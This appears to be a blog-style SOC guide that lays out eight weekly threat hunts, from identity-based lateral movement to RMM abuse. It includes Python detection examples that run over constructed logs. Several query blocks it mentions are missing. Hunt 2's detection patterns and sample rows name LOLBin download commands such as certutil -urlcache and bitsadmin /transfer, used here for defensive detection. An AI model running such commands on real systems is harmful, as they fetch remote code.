The CrowdStrike 2025 Threat Hunting Report found that 81% of hands-on-keyboard intrusions were malware-free — meaning four out of five active intrusions left no executable for an EDR signature to catch. The MITRE Engenuity ATT&CK Evaluations Enterprise 2026 round opens with the same conclusion in its scenario design notes: adversaries now rely on “abuse of trust rather than software exploitation, leveraging user interaction, valid credentials, and legitimate administrative capabilities.” If your SOC is still waiting for alerts to fire, you are watching the wrong door.
This is what makes weekly threat hunting non-negotiable in 2026. The slow, identity-led, living-off-the-land intrusions that dominate the current landscape do not trip thresholds. They look like work. The only way to find them is to go looking — with a structured playbook, a defined cadence, and queries written against the techniques adversaries are actually using right now. What follows is a working set: the weekly hunts that consistently surface real activity, why each one matters in 2026 specifically, and how to write the queries against the platforms most SOCs already own.
Why Weekly Cadence, Not Daily or Quarterly
Hunting cadence is a tradeoff between analyst fatigue and dwell time. The Picus Red Report 2026, drawn from analysis of over 1,084,718 malware samples, shows that adversaries now optimize for persistence over speed — Boot or Logon Autostart Execution (T1547) climbed from the bottom of the top-ten list into seventh place because attackers want to survive reboots, patch cycles, and analyst shift changes. Quarterly hunts let that persistence mature. Daily hunts burn out the team and produce shallow results.
Weekly cadence hits the useful middle. It catches persistence that established itself between hunts, it gives analysts time to baseline what “normal” looks like across a seven-day window, and it produces a rhythm where each hunt feeds the next week’s hypotheses. Run the same playbook every Monday. Document deltas. Promote anything that consistently surfaces real findings into a scheduled analytic rule and replace it in the playbook with a fresh hypothesis.
The hunts below assume a SIEM or XDR with at least 30 days of endpoint, identity, and network telemetry — Microsoft Sentinel, Splunk, Elastic, or equivalent. Query syntax varies; the hunting logic does not.
Hunt 1: Identity-Driven Lateral Movement Through Valid Accounts
Unit 42’s 2026 Global Incident Response Report attributes 65% of initial access to identity-based techniques and finds identity weaknesses present in 90% of incidents. Lateral movement now looks like authentication, not exploitation. The hunt: surface accounts logging into hosts they do not normally touch, especially during off-hours, and especially through interactive logon types.
The skeleton in KQL against SecurityEvent:
This pattern — count distinct destinations per account this week, then anti-join against a 60-day baseline of accounts that already touch many hosts — surfaces accounts whose breadth changed. Service accounts and admins will dominate the baseline; what’s left is what matters. Pivot from any hit into 4672 (special privileges assigned), 4768/4769 (Kerberos ticket activity), and any 4648 (explicit credential logon) involving the same account.
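The same hunting logic as an added Python example (not the page's KQL), run over constructed 4624-style logon rows: a 60-day baseline of hosts per account, the anti-join that drops accounts already broad in that baseline, and a rank by off-hours interactive logons to new hosts. Swapping the keys (user and IP/ASN, or edge device and destination ASN) gives the baseline anti-join Hunts 4 and 5 describe; the `BROAD` and `OFF_HOURS` thresholds are assumptions to tune.

```python
from collections import defaultdict
from datetime import datetime, timedelta
INTERACTIVE = {2, 10, 11}   # interactive, RDP and cached-interactive logon types
BROAD = 10                  # assumption: baseline breadth that marks an account as already touching many hosts
OFF_HOURS = range(0, 7)     # assumption: 00:00-06:59 counts as off-hours

def hosts_per_account(events, start, end):
    """account -> set of destination hosts seen in [start, end)."""
    seen = defaultdict(set)
    for e in events:
        if start <= e["time"] < end:
            seen[e["account"]].add(e["dest"])
    return seen

def hunt_lateral_movement(events, week_start, baseline_days=60):
    """Accounts reaching hosts absent from their baseline, ranked by off-hours interactive logons."""
    week_end = week_start + timedelta(days=7)
    this_week = hosts_per_account(events, week_start, week_end)
    baseline = hosts_per_account(events, week_start - timedelta(days=baseline_days), week_start)
    findings = []
    for account, hosts in this_week.items():
        base = baseline.get(account, set())
        if len(base) >= BROAD:      # anti-join: admins and service accounts already broad in the baseline
            continue
        new_hosts = hosts - base
        if not new_hosts:
            continue
        risky = sum(1 for e in events
                    if e["account"] == account and e["dest"] in new_hosts
                    and week_start <= e["time"] < week_end
                    and e["logon_type"] in INTERACTIVE and e["time"].hour in OFF_HOURS)
        findings.append({"account": account, "new_hosts": sorted(new_hosts),
                         "off_hours_interactive": risky})
    return sorted(findings, key=lambda f: -f["off_hours_interactive"])

def ev(account, dest, when, logon_type=3):
    return {"account": account, "dest": dest, "time": when, "logon_type": logon_type}

WEEK_START = datetime(2026, 3, 2)   # constructed hunt week (a Monday)
SAMPLE_EVENTS = (                   # constructed 4624-style rows, not real telemetry
    [ev("svc_backup", f"SRV{i:02d}", WEEK_START - timedelta(days=20)) for i in range(12)]
    + [ev("svc_backup", "SRV99", WEEK_START + timedelta(days=1))]
    + [ev("jdoe", "WS01", WEEK_START - timedelta(days=5), 2),
       ev("jdoe", "WS01", WEEK_START + timedelta(days=1, hours=9), 2),
       ev("jdoe", "FS01", WEEK_START + timedelta(days=2, hours=3), 10),
       ev("jdoe", "DC01", WEEK_START + timedelta(days=2, hours=3, minutes=12), 10),
       ev("asmith", "WS02", WEEK_START - timedelta(days=3), 2),
       ev("asmith", "WS02", WEEK_START + timedelta(days=3, hours=10), 2)]
)
```

Here `svc_backup` is dropped by the anti-join despite a new host, `asmith` has no new hosts, and only `jdoe` surfaces, with two off-hours RDP logons to hosts outside the baseline.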
Hunt 2: Process Injection and LOLBin Abuse
T1055 (Process Injection) holds the #1 spot for the third consecutive year in the Picus Red Report 2026. T1059 (Command and Scripting Interpreter) sits at #2. Together they dominate post-compromise activity because they let attackers run inside trusted processes — svchost.exe, explorer.exe, lsass.exe — using binaries already signed by Microsoft.
The weekly hunt has two halves. First, suspicious child-process relationships: winword.exe spawning powershell.exe, mshta.exe invoking cmd.exe, rundll32.exe launching network connections. Second, signed Microsoft binaries doing things they should not — certutil.exe -urlcache, bitsadmin /transfer, regsvr32 /s /u /i:http://, mshta.exe http://. The LOLBAS Project maintains the canonical reference of these abuses; pin its current list and write a query that flags any process command line containing those patterns where the parent is not a known IT management tool.
The output will include legitimate admin scripts. That is the point — the hunt teaches you what your admins do. After three weeks of tuning, what’s left is genuinely anomalous.
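An added Python example of the second half of this hunt, not code from the page or from the LOLBAS Project: the parent/child pairs and signed-binary command-line patterns named above, applied to constructed process-creation rows, with an allowlist of management parents that stands in for the tuning described. The pattern list is a pinned subset, and `it-mgmt-agent.exe` is a placeholder name for whatever your IT tooling actually spawns from.

```python
import re

# Parent -> child pairs the hunt names as rarely legitimate
SUSPICIOUS_PAIRS = {("winword.exe", "powershell.exe"), ("mshta.exe", "cmd.exe")}
# Signed-binary abuses named on the page; a pinned subset, not the full LOLBAS list
LOLBIN_PATTERNS = [
    re.compile(r"certutil(\.exe)?\b.*-urlcache", re.I),
    re.compile(r"bitsadmin(\.exe)?\b.*/transfer", re.I),
    re.compile(r"regsvr32(\.exe)?\b.*/i:https?://", re.I),
    re.compile(r"mshta(\.exe)?\b.*https?://", re.I),
]
# Assumption: parents that legitimately spawn these in your estate; the second is a placeholder name
KNOWN_MGMT_PARENTS = {"ccmexec.exe", "it-mgmt-agent.exe"}

def basename(path):
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()

def hunt_lolbin_abuse(process_events):
    """Flag suspicious parent/child pairs and LOLBin command lines whose parent is not known IT tooling."""
    findings = []
    for e in process_events:
        parent, child = basename(e["parent_image"]), basename(e["image"])
        if parent in KNOWN_MGMT_PARENTS:
            continue
        reasons = []
        if (parent, child) in SUSPICIOUS_PAIRS:
            reasons.append(f"suspicious child: {parent} -> {child}")
        reasons += [f"lolbin pattern: {p.pattern}" for p in LOLBIN_PATTERNS if p.search(e["command_line"])]
        if reasons:
            findings.append({"host": e["host"], "parent": parent, "child": child, "reasons": reasons})
    return findings

SAMPLE_EVENTS = [  # constructed process-creation rows
    {"host": "WS07", "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -w hidden -File C:\\Users\\Public\\update.ps1"},
    {"host": "WS07", "parent_image": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\certutil.exe",
     "command_line": "certutil.exe -urlcache -split -f http://example.invalid/a.txt a.txt"},
    {"host": "SRV02", "parent_image": r"C:\Windows\CCM\CcmExec.exe",
     "image": r"C:\Windows\System32\bitsadmin.exe",
     "command_line": "bitsadmin /transfer pkg http://example.invalid/pkg.msi C:\\Temp\\pkg.msi"},
    {"host": "WS09", "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\notepad.exe", "command_line": "notepad.exe notes.txt"},
]

if __name__ == "__main__":
    for f in hunt_lolbin_abuse(SAMPLE_EVENTS):
        print(f)
```

The bitsadmin row is suppressed only because its parent is on the allowlist; that suppression is exactly what the weeks of tuning should decide, not a default.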
Hunt 3: Persistence Through Scheduled Tasks and Autoruns
T1053.005 (Scheduled Task) and T1547 (Boot or Logon Autostart Execution) are the persistence mechanisms behind Tarrask, Emotet, IcedID, and most current ransomware operators. The CIS guidance on scheduled-task abuse remains the cleanest reference for the legitimate-versus-malicious distinction. The weekly hunt looks for tasks created in the last seven days, especially those with no author, with executable paths in user-writable directories (%APPDATA%, %TEMP%, C:\Users\Public), or with command lines that invoke a shell.
Splunk SPL against Windows event logs:
Pair this with a parallel hunt against HKLM\Software\Microsoft\Windows\CurrentVersion\Run and HKCU\...\Run registry writes for the same week. Anything new that points at a script interpreter or a binary in a temp path is worth a second look.
Hunt 4: Cloud Token Theft and OAuth Application Abuse
The MITRE ATT&CK Evaluations Enterprise 2026 explicitly flags cloud and infrastructure-focused environments as a primary risk surface. The dominant pattern: token theft via infostealers, then session replay against Microsoft 365, Google Workspace, or Okta from infrastructure the user has never used. Conditional access alone does not catch this — the attacker has the token.
The weekly hunt: aggregate sign-ins per user, identify sessions where the IP, ASN, or device fingerprint diverges from that user’s 30-day baseline, and prioritize any session that exercised admin consent grants or created new OAuth applications.
Layer a second query against AuditLogs filtered to Add OAuth2PermissionGrant, Consent to application, and Add app role assignment to user. Any consent grant in a week where Hunt 1 also surfaced anomalous lateral movement is a likely incident.
Hunt 5: Edge Device and Perimeter Exploitation Aftermath
CrowdStrike’s 2025 reporting and Barracuda’s Managed XDR data both flag edge-device exploitation as a primary initial-access vector — VPN appliances, firewalls, ADC products. The exploit itself happens before your SIEM sees anything; the hunt is for what comes next. Look for outbound connections from those edge devices that should never originate traffic, new admin accounts created on the appliance, and config changes outside change-management windows.
If your perimeter device exports syslog, the weekly hunt aggregates new outbound connections grouped by source device and destination ASN, anti-joined against the 60-day baseline. Anything new is investigated. Edge devices that never phoned out before should not start phoning out now.
The Weekly Hunt Reference
Pin this above the desk of whoever runs the Monday hunt rotation. Each row is one query, one MITRE technique, one telemetry source — designed to be run in under thirty minutes per hunt.
The eight hunts above can be split across the working week — two on Monday, two on Wednesday, four on Friday — or run in a single Monday block by a rotating analyst. The point is that they run on a schedule, and that the results are written down somewhere persistent so deltas across weeks are visible.
Three More Hunts Worth Considering Beyond the Core Five
Rare outbound DNS and C2 patterns (Hunt 6). Domains queried by fewer than three internal hosts over a rolling 30-day window are rare by definition; if one of them is also a high-entropy subdomain on a recently registered domain, that is a hunt finding before any IOC feed catches up. Add JA4 TLS fingerprinting where you have packet capture — uncommon fingerprints clustered on a handful of internal hosts is a strong C2 signal.
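Hunt 6's rarity-plus-entropy logic as an added Python example (not the page's own query), run over constructed (source host, queried name) pairs: domains resolved by fewer than three hosts are kept, the Shannon entropy of their leftmost label is scored, and a registration-age lookup (assumed to come from WHOIS/RDAP enrichment) marks recently registered domains. The entropy and age thresholds are assumptions, and the two-label registrable-domain split does not handle suffixes such as `co.uk`.

```python
import math
from collections import defaultdict

RARE_HOSTS = 3          # page: queried by fewer than three internal hosts over the window
ENTROPY_MIN = 3.5       # assumption: bits per character above which a label looks machine-generated
NEW_DOMAIN_DAYS = 30    # assumption: registration age treated as recently registered

def shannon_entropy(label):
    """Bits per character of a DNS label; random-looking labels score near log2(alphabet size)."""
    n = len(label)
    if not n:
        return 0.0
    counts = defaultdict(int)
    for c in label:
        counts[c] += 1
    return -sum(v / n * math.log2(v / n) for v in counts.values())

def split_name(fqdn):
    """(registrable domain, leftmost subdomain label); assumption: two-label TLDs are not handled."""
    parts = fqdn.lower().rstrip(".").split(".")
    return ".".join(parts[-2:]), (parts[0] if len(parts) > 2 else "")

def hunt_rare_dns(dns_events, domain_age_days):
    """dns_events: (source host, queried name); domain_age_days: registrable domain -> days since registration."""
    hosts, labels = defaultdict(set), defaultdict(set)
    for src, fqdn in dns_events:
        domain, label = split_name(fqdn)
        hosts[domain].add(src)
        if label:
            labels[domain].add(label)
    findings = []
    for domain, srcs in hosts.items():
        if len(srcs) >= RARE_HOSTS:      # not rare: much of the estate resolves it
            continue
        ent = max((shannon_entropy(l) for l in labels[domain]), default=0.0)
        age = domain_age_days.get(domain)
        high, recent = ent >= ENTROPY_MIN, age is not None and age <= NEW_DOMAIN_DAYS
        findings.append({"domain": domain, "hosts": sorted(srcs), "max_label_entropy": round(ent, 2),
                         "domain_age_days": age, "priority": high and recent})
    return sorted(findings, key=lambda f: (not f["priority"], f["domain"]))

SAMPLE_DNS = (   # constructed (source host, queried name) pairs for a 30-day window
    [(f"WS{i:02d}", "intranet.corp.test") for i in range(50)]
    + [("WS11", "fkq3x8t2zl9v.c2-relay.test"), ("WS11", "p0q9w8e7r6t5.c2-relay.test"),
       ("WS03", "www.vendor-portal.test")]
)
SAMPLE_DOMAIN_AGE = {"corp.test": 4000, "c2-relay.test": 12, "vendor-portal.test": 2100}  # constructed ages
```

Both rare domains are returned for triage; only the one combining a high-entropy label with a young registration is marked priority, which is the finding the paragraph describes.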
Service creation and SMB fan-out (Hunt 7). Event ID 7045 (service installed) plus 4697 (service created via service control manager) fanning out across more than three destination hosts within an hour, originating from a single account, is the textbook pattern for tools that propagate via SMB and remote service creation. The behaviour predates ransomware deployment in most current incidents.
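The fan-out window from Hunt 7 as an added Python example (not the page's own query): service-installation events (7045 and 4697) are grouped per account and a sliding one-hour window counts distinct destination hosts, flagging any account that exceeds three. The event rows are constructed; the event IDs are the ones the paragraph names.

```python
from collections import defaultdict
from datetime import datetime, timedelta

SERVICE_EVENTS = {7045, 4697}   # service installed / service created via the service control manager
FANOUT_HOSTS = 3                # page: more than three destination hosts within an hour
WINDOW = timedelta(hours=1)

def hunt_service_fanout(events, fanout=FANOUT_HOSTS, window=WINDOW):
    """One account installing services on more than `fanout` distinct hosts inside any sliding window."""
    by_account = defaultdict(list)
    for e in events:
        if e["event_id"] in SERVICE_EVENTS:
            by_account[e["account"]].append((e["time"], e["host"]))
    findings = []
    for account, rows in by_account.items():
        rows.sort()
        lo = 0
        for hi in range(len(rows)):
            while rows[hi][0] - rows[lo][0] > window:   # drop rows that fell out of the window
                lo += 1
            hosts = {h for _, h in rows[lo:hi + 1]}
            if len(hosts) > fanout:
                findings.append({"account": account, "window_start": rows[lo][0], "hosts": sorted(hosts)})
                break   # one finding per account is enough to open an investigation
    return findings

T0 = datetime(2026, 3, 3, 22, 0)   # constructed timestamp base
SAMPLE_EVENTS = (                  # constructed rows: 5 hosts in 16 minutes vs 4 hosts spread over 6 hours
    [{"event_id": 7045, "account": "CORP\\svc_deploy", "host": f"WS{i:02d}",
      "time": T0 + timedelta(minutes=4 * i)} for i in range(5)]
    + [{"event_id": 4697, "account": "CORP\\admin1", "host": f"SRV{i:02d}",
        "time": T0 + timedelta(hours=2 * i)} for i in range(4)]
    + [{"event_id": 4624, "account": "CORP\\admin1", "host": "SRV09", "time": T0}]   # logon, ignored
)

if __name__ == "__main__":
    for f in hunt_service_fanout(SAMPLE_EVENTS):
        print(f)
```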
RMM abuse (Hunt 8). Sophos’s 2026 reporting on DragonForce and similar groups documents direct compromise of legitimate remote management tools — SimpleHelp, Atera, ScreenConnect — to deploy ransomware across managed-service-provider customer fleets simultaneously. The hunt is straightforward: enumerate which RMM tools your IT actually deploys, then alert on any other RMM binary appearing on any endpoint.
Common Pitfalls
Hunting without a baseline. Every query above leans on comparison to historical activity. A SOC that runs the queries against last week with no longer-term reference will drown in false positives in week one and stop hunting in week three. Build the 30-to-60-day baseline first, even if it means delaying the first hunt cycle.
Treating findings as alerts. Hunting output is evidence, not detection. A weekly hunt that surfaces fifty rows is doing its job; the analyst’s job is to triage them down to the handful worth investigating. SOCs that try to convert every hunt into a real-time analytic rule end up with alert storms and abandon the practice.
Letting the playbook calcify. Threats change. The Picus Red Report 2026 notes that adversaries currently show “no notable uptick yet in the use of AI-driven malware techniques” — but that will not hold forever. Retire hunts that have not produced findings in three months. Replace them with hunts derived from this quarter’s threat intelligence. The OTRF ThreatHunter-Playbook project, updated in January 2026 to incorporate Agent Skills, is a useful source of current hunt templates.
Ignoring the report stage. The Plan-Execute-Report lifecycle from the OTRF framework treats reporting as load-bearing, not optional. A hunt that found nothing is still worth documenting — it tells you which techniques you have visibility on and which you do not. Visibility gaps are findings.
FAQ
Should we automate these hunts into scheduled analytics? Some, yes — once a query has produced consistent, high-fidelity findings for several weeks. But not all. The value of weekly hunting is partly that an analyst’s eyes are on the data, building intuition. Automate the noisy mechanical parts; keep the interpretation human.
Does this work without a SIEM? Partially. Hunts 2 and 3 can run against EDR telemetry alone if your EDR exposes a query language (Defender Advanced Hunting, CrowdStrike Falcon LogScale, SentinelOne Deep Visibility). Hunts 1, 4, and 5 require log aggregation across identity and network sources. If you do not have that aggregation, building it is the prerequisite.
How do AI-augmented hunting platforms change this? ISC2’s 2025 Workforce Study reports 48% of cybersecurity professionals experiencing exhaustion keeping current with threats. The agentic-SOC vendors — Dropzone AI, Prophet Security, others marketed at RSA 2026 — pitch hunt automation as a response. Reasonable for the mechanical execution; the hypothesis-formation and interpretation work still belongs to humans, and pretending otherwise produces investigations that look thorough but miss the unique-to-your-environment signals that matter most.
What about MITRE ATT&CK Evaluations Enterprise 2026? The 2026 round, with results publishing December 2026, introduces a Total Evaluation Score combining Detection Quality and Protection Quality. Use the published per-technique results as a sanity check on your own coverage — if a vendor your SOC depends on scored poorly on T1078 detection, your Hunt 1 is doing more work than you thought.
What to Do Monday Morning
Pick two hunts. Start with Hunt 1 (lateral movement) and Hunt 2 (LOLBin abuse) — they cover the techniques most likely to be active right now in most environments. Run them. Write down what surfaced, what you investigated, and what you concluded. Do it again the next Monday. By week four you will have a baseline, by week eight you will have either tuned the queries to fit your environment or replaced them with better ones, and by quarter end you will have a hunting practice — not a hunting plan that lives in a Confluence page no one reads.
The threats are not waiting for permission to mature in your network. Neither should the hunt.